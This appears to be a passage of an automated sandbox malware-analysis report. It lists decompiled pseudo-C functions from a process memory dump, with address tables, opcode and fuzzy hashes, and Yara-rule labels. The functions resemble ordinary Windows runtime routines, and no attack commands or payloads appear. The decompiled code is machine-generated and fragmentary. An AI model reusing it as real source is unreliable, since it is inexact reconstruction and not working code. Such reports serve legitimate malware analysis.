					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x00f4bc36
0x00f4bc42
0x00f4bc45
0x00f4bc4a
0x00f4bd35
0x00000000
0x00000000
0x00000000
0x00000000
0x00f4bc50
0x00f4bc50
0x00f4bc58
0x00f4bc5a
0x00f4bc60
0x00000000
0x00000000
0x00f8a4f2
0x00f8a4f6
0x00000000
0x00000000
0x00000000
0x00f8a4fc
0x00f4bc79
0x00f4bc7e
0x00f4bc86
0x00f4bd16
0x00f4bd20
0x00f4bd20
0x00f4bc8d
0x00f4bc94
0x00f4bcbd
0x00f4bcca
0x00f4bccb
0x00f4bccc
0x00f4bccd
0x00f4bcce
0x00f4bcd4
0x00f4bcea
0x00f4bcee
0x00f4bcf2
0x00f4bd00
0x00f4bd04
0x00000000
0x00f4bc96
0x00f4bcab
0x00f4bcaf
0x00f4bd2c
0x00f4bd2c
0x00f4bd09
0x00000000
0x00f4bd09
0x00f4bcb1
0x00f4bcb5
0x00f4bcbb
0x00000000
0x00000000
0x00000000
0x00f4bcbb

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2841bc4aaac76a7b8694a69f78c3e9421088c1ad0cc09af0270584718b954cb
Instruction ID: 140b36c70c1f537dd92841fd936104875160d2af6a9c61bd1e3028d90a446e0c
Opcode Fuzzy Hash: b2841bc4aaac76a7b8694a69f78c3e9421088c1ad0cc09af0270584718b954cb
Instruction Fuzzy Hash: E731F236A006159BDB22DF58D8C07A677B5FF18321F1440B9ED84DB206E77ADD45EB80

Uniqueness

Uniqueness Score: -1.00%

Function 00F41DB5, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00F41DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E00F3F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L00F34620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E00F3F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x00f41dc2
0x00f41dc5
0x00f41dc7
0x00f41dcc
0x00f41dce
0x00f41dd6
0x00f41ddf
0x00f41de0
0x00f41de1
0x00f41de5
0x00f41de8
0x00f41def
0x00f41df0
0x00f41df6
0x00f41df7
0x00f41dfe
0x00f41e1a
0x00000000
0x00000000
0x00f41e0b
0x00f41e12
0x00f41e12
0x00f41e00
0x00f41e00
0x00f41e05
0x00f41e1e
0x00f41e23
0x00f8570f
0x00f85713
0x00000000
0x00000000
0x00f85719
0x00f85719
0x00f41e2c
0x00f41e2d
0x00f41e2e
0x00f41e2f
0x00f41e31
0x00f41e32
0x00f41e35
0x00f41e3d
0x00f85723
0x00f8573d
0x00f8573d
0x00000000
0x00f85723
0x00f41e49
0x00f41e4e
0x00f41e4e
0x00f41e09
0x00000000

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: 21c117a70d41fa8ecb8204f1caa4df301d9eb29a55afb94dc3e816c72bfa1e96
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: 9A216D76A00529ABD721DF59CC80EABBFB9FF85750F114055ED0597210D634AE41E7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00F19100, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00F19100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0xfef6e8);
				E00F6D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E00FE88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E00F6D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x10086c0; // 0xaa07b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x10086b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E00F32280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E00FE88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E00F5AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x100b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x10084c0;
										if(_t69 >=  *0x10084c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E00FE9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E00F1922A(_t82);
							_t53 = E00F37D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E00FE8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x10086c0; // 0xaa07b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x10086b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x10086bc;
										_t72 = 0x10086b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E00F19240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x10086c4;
									_t72 = 0x10086c0;
									L18:
									E00F49B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x00f19100
0x00f19100
0x00f19100
0x00f19100
0x00f19102
0x00f19107
0x00f1910c
0x00f19110
0x00f19115
0x00f19136
0x00f19143
0x00f737e4
0x00f737e4
0x00f19149
0x00f1914e
0x00f1914e
0x00f19117
0x00f1911d
0x00000000
0x00000000
0x00f1911f
0x00f19125
0x00000000
0x00f19151
0x00f19158
0x00f1915d
0x00f19161
0x00f19168
0x00f73715
0x00000000
0x00f1916e
0x00f1916e
0x00f19175
0x00f19177
0x00f1917e
0x00f1917f
0x00f19182
0x00f19182
0x00f19187
0x00f19187
0x00f1918a
0x00f1918d
0x00f1918f
0x00f19192
0x00f19195
0x00f19198
0x00f19198
0x00f19198
0x00f1919a
0x00000000
0x00000000
0x00f7371f
0x00f73721
0x00f73727
0x00f7372f
0x00f73733
0x00f73735
0x00f73738
0x00f7373b
0x00f7373d
0x00f73740
0x00000000
0x00000000
0x00f73746
0x00f73749
0x00000000
0x00000000
0x00f7374f
0x00f73751
0x00000000
0x00000000
0x00f73757
0x00f73759
0x00f7375c
0x00f7375c
0x00f7375e
0x00f7375e
0x00f73761
0x00f73764
0x00000000
0x00000000
0x00f73766
0x00f73768
0x00f737a3
0x00f737a3
0x00f737a5
0x00f737a7
0x00f737ad
0x00f737b0
0x00f737b2
0x00f737bc
0x00f737c2
0x00f737c2
0x00f737b2
0x00f19187
0x00f19187
0x00f1918a
0x00f1918d
0x00f1918f
0x00f19192
0x00f19195
0x00000000
0x00f19195
0x00000000
0x00f19187
0x00f7376a
0x00f7376a
0x00f7376c
0x00f7376c
0x00f7376f
0x00f73775
0x00000000
0x00000000
0x00f73777
0x00f73779
0x00000000
0x00000000
0x00f73782
0x00f73787
0x00f73789
0x00f73790
0x00f73790
0x00f7378b
0x00f7378b
0x00f7378b
0x00f73792
0x00f73795
0x00f73795
0x00f73798
0x00f73798
0x00f7379b
0x00f7379b
0x00f191a3
0x00f191a9
0x00f191b0
0x00f191b4
0x00f191b4
0x00f191bb
0x00f191c0
0x00f191c5
0x00f191c7
0x00f737da
0x00f191cd
0x00f191cd
0x00f191cd
0x00f191d2
0x00f191d5
0x00f19239
0x00f19239
0x00f191d7
0x00f191db
0x00f191e1
0x00f191e7
0x00f191fd
0x00f19203
0x00f1921e
0x00f19223
0x00000000
0x00f19223
0x00f19205
0x00f19208
0x00f1920c
0x00f19214
0x00f19214
0x00f191e9
0x00f191e9
0x00f191ee
0x00f191f3
0x00f191f3
0x00f191f3
0x00f191e7
0x00000000
0x00f191db
0x00f19187
0x00f19168

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca232c97da99669edccbd7f006ed27df1e57e88cb07cf54c7dd59f411711614b
Instruction ID: 0c5b514350409901730cf755adc2f79fdd79be3984879ea63d5ec3944fc39930
Opcode Fuzzy Hash: ca232c97da99669edccbd7f006ed27df1e57e88cb07cf54c7dd59f411711614b
Instruction Fuzzy Hash: 7F31C571E09286EFDB25DB68C8587ECB7B1BB48320F15815AD40477241C3B5AEC0EB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F30050, Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00F30050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x100d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E00F49ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E00F5B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E00FE8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E00F49702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x100b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x00f30055
0x00f3005d
0x00f30062
0x00f3006c
0x00f3006f
0x00f30074
0x00f3007a
0x00f3007a
0x00f30080
0x00f30080
0x00f30087
0x00f3008d
0x00f3008f
0x00f30093
0x00f30095
0x00f3009b
0x00f300f8
0x00f300fb
0x00f300fc
0x00f300ff
0x00f30108
0x00f30108
0x00f300a2
0x00f300a6
0x00f300b3
0x00f300bc
0x00f300c5
0x00f300ca
0x00f7c01e
0x00000000
0x00000000
0x00f7c02d
0x00f300d5
0x00f300d9
0x00f7c03d
0x00f7c046
0x00f7c046
0x00f300df
0x00f300e2
0x00f300ea
0x00f300ef
0x00f300f2
0x00f300f6
0x00f30111
0x00f30117
0x00f30117
0x00000000
0x00f300f6
0x00f300d0
0x00f300d0
0x00000000

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82ac9048bfb5cc7fad2498781eb19f6902b93fcdee5cd37d145ddb58fa4b33f6
Instruction ID: f8b3f28a09a01cf2e7fc21985fa43bb9c50842b730d2b7d68bd0146ee3398b4d
Opcode Fuzzy Hash: 82ac9048bfb5cc7fad2498781eb19f6902b93fcdee5cd37d145ddb58fa4b33f6
Instruction Fuzzy Hash: D131BF71601B04CFD725CF28C850B96B3E5FF88724F14856EE49A87650DB75AC01EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F96C0A, Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00F96C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E00F37D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x1007b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L00F34620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E00F5F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E00F37D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E00F59AE0();
						_t23 = L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x00f96c0a
0x00f96c0f
0x00f96c10
0x00f96c13
0x00f96c15
0x00f96c19
0x00f96c1c
0x00f96c21
0x00f96c28
0x00f96c3a
0x00f96c2a
0x00f96c33
0x00f96c33
0x00f96c3f
0x00f96c48
0x00f96c4d
0x00f96c60
0x00f96c65
0x00f96c69
0x00f96c73
0x00f96c79
0x00f96c7f
0x00f96c86
0x00f96c90
0x00f96c94
0x00f96ca6
0x00f96cb2
0x00f96cbd
0x00f96cbd
0x00f96cc3
0x00f96cc7
0x00f96ccb
0x00f96cd0
0x00f96cd1
0x00f96ce2
0x00f96ce2
0x00f96c69
0x00f96ced

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6999b08102d68666945d315ba49a31bd1cba5573b9266823c6682364f1be351
Instruction ID: 5a09a6607ca5e56f0a4cf4323bd3c23758fd9063456c52a36113e86f24b335bc
Opcode Fuzzy Hash: d6999b08102d68666945d315ba49a31bd1cba5573b9266823c6682364f1be351
Instruction Fuzzy Hash: 6F219AB1A00644ABDB26DB68D881F2AB7A8FF48710F1400A9F944D7791D639ED10DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00F590AF, Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00F590AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E00F6D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E00F4E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L00F34620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E00F5F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E00F4A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x00f590af
0x00f590b8
0x00f590bb
0x00f590bf
0x00f590c2
0x00f590c2
0x00f590c8
0x00f590cb
0x00f590cd
0x00f914d7
0x00f914eb
0x00f914eb
0x00000000
0x00f914eb
0x00f914db
0x00f914e6
0x00000000
0x00f914f2
0x00f914e8
0x00000000
0x00f914e8
0x00f590d8
0x00f590da
0x00f590dd
0x00f590e5
0x00000000
0x00f59139
0x00f590fa
0x00f590fe
0x00f59142
0x00000000
0x00f59142
0x00f59104
0x00f59107
0x00f5910b
0x00f59110
0x00f59118
0x00f59147
0x00f59148
0x00f5914f
0x00f59150
0x00f59151
0x00f59152
0x00f59156
0x00f5915d
0x00f59160
0x00f59168
0x00f5916c
0x00f591bc
0x00f591be
0x00000000
0x00f591be
0x00f5916e
0x00f59173
0x00f59176
0x00000000
0x00000000
0x00f5917c
0x00f59180
0x00f591b5
0x00000000
0x00f591b5
0x00f59182
0x00f59185
0x00f59189
0x00000000
0x00000000
0x00f5918e
0x00f59190
0x00f59198
0x00000000
0x00000000
0x00f591a0
0x00000000
0x00f591ad
0x00f591ad
0x00f591b0
0x00f591b1
0x00000000
0x00f59185
0x00f5911a
0x00f5911c
0x00f5911f
0x00f59125
0x00f59127
0x00000000

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: 001e2fcf472506be4196c74b17f99b29d5a07dd41d24c80b19c17302ce9534a0
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: 41218072A00615EFDB21DF69C845A6AF7F8EB54321F14887AEA49A7240D370ED04EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F43B7A, Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00F43B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x10084c4; // 0x0
				_v12 = 1;
				_v8 =  *0x10084c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L00F34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x10084c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E00F5AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E00F5FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x10084c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x10084c4; // 0x0
					L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x00f43b89
0x00f43b96
0x00f43ba1
0x00f43bab
0x00f43bb5
0x00f43bb9
0x00f86298
0x00f43bbf
0x00f43bc2
0x00f43bc3
0x00f43bc9
0x00f43bca
0x00f43bcc
0x00f43bcd
0x00f43bd4
0x00f43bd6
0x00f43bdb
0x00f43bea
0x00f43bf7
0x00f43bfb
0x00f43bff
0x00f43c09
0x00f43c0a
0x00f43c0b
0x00f43c0f
0x00f43c14
0x00f43c18
0x00f43c18
0x00f43bfb
0x00f43c1b
0x00f43c30
0x00f43c30
0x00f43c3d

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be64c20fe15543b1c6394f7975023d54cd93b37ed1c65ccbbf8215fffe4d59c5
Instruction ID: cb65123d6d979710e6341970e3f466c7a03433defe3880ce30584a8a9a668eb7
Opcode Fuzzy Hash: be64c20fe15543b1c6394f7975023d54cd93b37ed1c65ccbbf8215fffe4d59c5
Instruction Fuzzy Hash: 5A21B072A00108AFCB11DF58CD81F5ABBBDFB40708F150069EA08AB251D775AE05DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F96CF0, Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00F96CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E00F37D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E00F37D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0xef5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E00F4F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E00F4F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E00F97016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L00F32400( &_v52);
								}
								_t21 = L00F32400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x00f96cfb
0x00f96d00
0x00f96d02
0x00f96d06
0x00f96d0a
0x00f96d0e
0x00f96d19
0x00f96d2b
0x00f96d1b
0x00f96d24
0x00f96d24
0x00f96d33
0x00f96d39
0x00f96d46
0x00f96d4f
0x00f96d61
0x00f96d51
0x00f96d5a
0x00f96d5a
0x00f96d69
0x00f96d6b
0x00f96d6d
0x00f96d6f
0x00f96d6f
0x00f96d74
0x00f96d79
0x00f96d7a
0x00f96d7f
0x00f96d82
0x00f96d88
0x00f96d89
0x00f96d90
0x00f96d94
0x00f96da7
0x00f96db1
0x00f96db1
0x00f96dbb
